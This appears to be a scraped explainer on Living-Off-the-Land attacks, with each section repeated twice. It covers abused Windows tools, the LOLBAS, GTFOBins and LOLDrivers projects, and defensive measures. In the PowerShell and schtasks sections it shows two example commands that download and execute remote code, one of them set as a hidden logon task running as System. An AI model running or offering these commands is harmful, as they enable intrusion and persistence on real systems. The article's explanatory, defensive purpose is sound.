Living-Off-the-Land (LOTL) Attack

LOTL Attack

In a LOTL attack, the hacker uses features and tools already available in the target system to continue the attack without being detected. This kind of attack doesn’t involve using malicious code or software that is simple for conventional security measures to identify. Rather, they take advantage of the administrative tools, batch files, and built-in system functions to take over the system and steal confidential data.

Living off the Land tools, methods, and procedures (TTPs) have been quite popular in the last few years, even though the word was first used in 2013. This is due in part to the typical defensive security approach’s inability to recognize new attacks, which involves blacklisting file hashes, domains, and other signs of threats found in earlier attacks.

A few instances of LotL attacks are the use of PowerShell or Windows Management Instrumentation (WMI) for malicious purposes, the creation of malicious scripts using built-in scripting languages like Python or Ruby, and the execution of malicious code using scheduled tasks and registry entries. These are covered in more detail in the section that follows.

LOTL Attack

In a LOTL attack, the hacker uses features and tools already available in the target system to continue the attack without being detected. This kind of attack doesn’t involve using malicious code or software that is simple for conventional security measures to identify. Rather, they take advantage of the administrative tools, batch files, and built-in system functions to take over the system and steal confidential data.

Living off the Land tools, methods, and procedures (TTPs) have been quite popular in the last few years, even though the word was first used in 2013. This is due in part to the typical defensive security approach’s inability to recognize new attacks, which involves blacklisting file hashes, domains, and other signs of threats found in earlier attacks.

A few instances of LotL attacks are the use of PowerShell or Windows Management Instrumentation (WMI) for malicious purposes, the creation of malicious scripts using built-in scripting languages like Python or Ruby, and the execution of malicious code using scheduled tasks and registry entries. These are covered in more detail in the section that follows.

Advantages of LOTL Attack

  • Finding anomalies can be challenging, even in cases when log files are generated.
  • Alarms are rarely raised when ordinary cloud services and system tools are used for data exfiltration.
  • The living off the land strategy makes it challenging to identify the source of an attack, even if one is found because many groups employ comparable methods and resources.
Advantages of LOTL Attack
  • Finding anomalies can be challenging, even in cases when log files are generated.
  • Alarms are rarely raised when ordinary cloud services and system tools are used for data exfiltration.
  • The living off the land strategy makes it challenging to identify the source of an attack, even if one is found because many groups employ comparable methods and resources.

Common Tools used in LOTL

CMD.exe:

A command-line interface called CMD.exe is easily accessible on all Windows operating systems. Attackers can engage with a basic terminal feature that it offers. It is still frequently seen as a tool for running unsafe applications or gathering simple information, even though it lacks many of the features and capabilities of PowerShell (such as the ability to run Visual Basic Scripts like its successors CScript and WScript). Batch scripts can be executed by CMD.exe, giving attackers further automation capabilities.

WScript.exe/CScript.exe:

Similar in functionality to CMD.exe, Windows-based and Console-Based Script hosts also allow for more attacker automation than its predecessor by executing Visual Basic Scripts.

Powershell:

PowerShell is a tried-and-true administrative tool that’s often used for attacks that target remote locations. PowerShell is a powerful scripting language that was introduced in 2006. Since then, additional versions have emerged with much expanded capabilities, including cross-platform functionality. Attackers may accomplish nearly anything using PowerShell, and they frequently obfuscate their scripts in a number of ways, Base 64 being one of the most widely used methods.

Example:

powershell.exe -nop -ep Bypass -noexit -c [System.
Net.ServicePointManager]::
ServerCertificateValidationCallback = { $true
}; iex ((New-Object System.Net.WebClient).
DownloadString(‘[REMOVED]’))

This command downloads an encrypted DLL into memory and uses the PowerShell reflective DLL loader code to run it.

schtasks.exe/at.exe:

While administrators can use Task Scheduler and Scheduled Service Command Line Interface to plan the execution of apps, updates, and backups, attackers can also make use of these tools to make sure their malware remains persistent or postpones its detonation.

Example:

schtasks /create /tn Trojan /tr “powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep
bypass -nop -c ‘IEX ((new-object net.webclient).
downloadstring(‘’[REMOVED]’’))’” /sc ONLOGON /ru
System

This scheduled task will execute a command at specific trigger moments on a local or remote system.

MSHTA.exe:

JavaScript, VBScript, and HTML Applications (.hta) can all be launched via the standalone executable Microsoft HTML Application host. Since this operates without a web browser, whatever mshta.exe is used to execute won’t be stopped by any related browser security measures.

Reg.exe:

Registry Hives, of which there are several, are essentially databases in which Windows keeps track of various events, configuration settings, and other unrelated information. Attackers use it frequently to store malware settings, keep track of targets, store executables in subkeys, and much more.

Wmic.exe:

WMI has a command-line interface called Windows Management Instrumentation Command-Line. When examining or modifying system settings on local or remote systems, administrators find it helpful. Moreover, scripts and executables can be utilized with it. For the same reason, attackers find it appealing and can use it to get around security measures like application allow listing.

Remote Admin tools:

LogMeIn, GoToMyPC, TeamViewer, VNC, Kaseya, Connect-Wise, Anydesk, and other similar programs are frequently used in environments to facilitate administrators’ remote access to a variety of systems. Attackers can misuse these tools to get access to the system.

Common Tools used in LOTL

CMD.exe:

A command-line interface called CMD.exe is easily accessible on all Windows operating systems. Attackers can engage with a basic terminal feature that it offers. It is still frequently seen as a tool for running unsafe applications or gathering simple information, even though it lacks many of the features and capabilities of PowerShell (such as the ability to run Visual Basic Scripts like its successors CScript and WScript). Batch scripts can be executed by CMD.exe, giving attackers further automation capabilities.

WScript.exe/CScript.exe:

Similar in functionality to CMD.exe, Windows-based and Console-Based Script hosts also allow for more attacker automation than its predecessor by executing Visual Basic Scripts.

Powershell:

PowerShell is a tried-and-true administrative tool that’s often used for attacks that target remote locations. PowerShell is a powerful scripting language that was introduced in 2006. Since then, additional versions have emerged with much expanded capabilities, including cross-platform functionality. Attackers may accomplish nearly anything using PowerShell, and they frequently obfuscate their scripts in a number of ways, Base 64 being one of the most widely used methods.

Example:

powershell.exe -nop -ep Bypass -noexit -c [System.
Net.ServicePointManager]::
ServerCertificateValidationCallback = { $true
}; iex ((New-Object System.Net.WebClient).
DownloadString(‘[REMOVED]’))

This command downloads an encrypted DLL into memory and uses the PowerShell reflective DLL loader code to run it.

schtasks.exe/at.exe:

While administrators can use Task Scheduler and Scheduled Service Command Line Interface to plan the execution of apps, updates, and backups, attackers can also make use of these tools to make sure their malware remains persistent or postpones its detonation.

Example:

schtasks /create /tn Trojan /tr “powershell.exe
-WindowStyle hidden -NoLogo -NonInteractive -ep
bypass -nop -c ‘IEX ((new-object net.webclient).
downloadstring(‘’[REMOVED]’’))’” /sc ONLOGON /ru
System
This scheduled task will execute a command at specific trigger moments on a local or remote system.

MSHTA.exe:

JavaScript, VBScript, and HTML Applications (.hta) can all be launched via the standalone executable Microsoft HTML Application host. Since this operates without a web browser, whatever mshta.exe is used to execute won’t be stopped by any related browser security measures.

Reg.exe:

Registry Hives, of which there are several, are essentially databases in which Windows keeps track of various events, configuration settings, and other unrelated information. Attackers use it frequently to store malware settings, keep track of targets, store executables in subkeys, and much more.

Wmic.exe:

WMI has a command-line interface called Windows Management Instrumentation Command-Line. When examining or modifying system settings on local or remote systems, administrators find it helpful. Moreover, scripts and executables can be utilized with it. For the same reason, attackers find it appealing and can use it to get around security measures like application allow listing.

Remote Admin tools:

LogMeIn, GoToMyPC, TeamViewer, VNC, Kaseya, Connect-Wise, Anydesk, and other similar programs are frequently used in environments to facilitate administrators’ remote access to a variety of systems. Attackers can misuse these tools to get access to the system.

Opensource Projects

Three initiatives are focused on providing guidance to prevent LOTL attacks.

LOLBAS:

Living Off The Land Binaries and Scripts (LOLBAS) is a project that compiles a list of Windows executables that can be used to bypass security controls, execute code, and more. It’s a resource for understanding how these binaries can be potentially exploited in a system.

GTFOBins:

GTFOBins is a similar project that focuses on Unix platforms. It curates Unix binaries that can be used to circumvent local security limitations, revealing how these binaries might be abused in compromised systems.

LOLDrivers:

LOLDrivers is a project that collects legitimate Windows drivers that can be used by attackers to circumvent security safeguards. It lists these drivers, their capabilities, and potential hazards to help with threat understanding and mitigation.

Opensource Projects

Three initiatives are focused on providing guidance to prevent LOTL attacks.

LOLBAS:

Living Off The Land Binaries and Scripts (LOLBAS) is a project that compiles a list of Windows executables that can be used to bypass security controls, execute code, and more. It’s a resource for understanding how these binaries can be potentially exploited in a system.

GTFOBins:

GTFOBins is a similar project that focuses on Unix platforms. It curates Unix binaries that can be used to circumvent local security limitations, revealing how these binaries might be abused in compromised systems.

LOLDrivers:

LOLDrivers is a project that collects legitimate Windows drivers that can be used by attackers to circumvent security safeguards. It lists these drivers, their capabilities, and potential hazards to help with threat understanding and mitigation.

Detection & Prevention

  • Multi-Factor Authentication (MFA): Even if an attacker manages to obtain the user’s password, it will be more difficult for them to access the system thanks to MFA’s extra security layer.
  • Principle of least privilege: Organizations can reduce the potential impact an attacker can cause by limiting user privileges.
  • Implement network segmentation: Organizations can restrict the ability of attackers to propagate by segmenting their networks into different parts.
  • Employee Training: Employees who receive cybersecurity awareness and safe practices training may be better able to spot odd system behavior, unexpected warnings or messages, or system modifications.
  • Leverage threat intelligence: Keeping up with emerging attack methods, indicators of compromise (IoCs), and other pertinent threat information, like supply chain intelligence, requires utilizing threat intelligence.
  • Monitor User Behavior: UEBA and other behavioral technologies monitor specific user activities, such as extended usage of a given system, the time of day a command is issued, and other anomalies in typical behavior.
Detection & Prevention
  • Multi-Factor Authentication (MFA): Even if an attacker manages to obtain the user’s password, it will be more difficult for them to access the system thanks to MFA’s extra security layer.
  • Principle of least privilege: Organizations can reduce the potential impact an attacker can cause by limiting user privileges.
  • Implement network segmentation: Organizations can restrict the ability of attackers to propagate by segmenting their networks into different parts.
  • Employee Training: Employees who receive cybersecurity awareness and safe practices training may be better able to spot odd system behavior, unexpected warnings or messages, or system modifications.
  • Leverage threat intelligence: Keeping up with emerging attack methods, indicators of compromise (IoCs), and other pertinent threat information, like supply chain intelligence, requires utilizing threat intelligence.
  • Monitor User Behavior: UEBA and other behavioral technologies monitor specific user activities, such as extended usage of a given system, the time of day a command is issued, and other anomalies in typical behavior.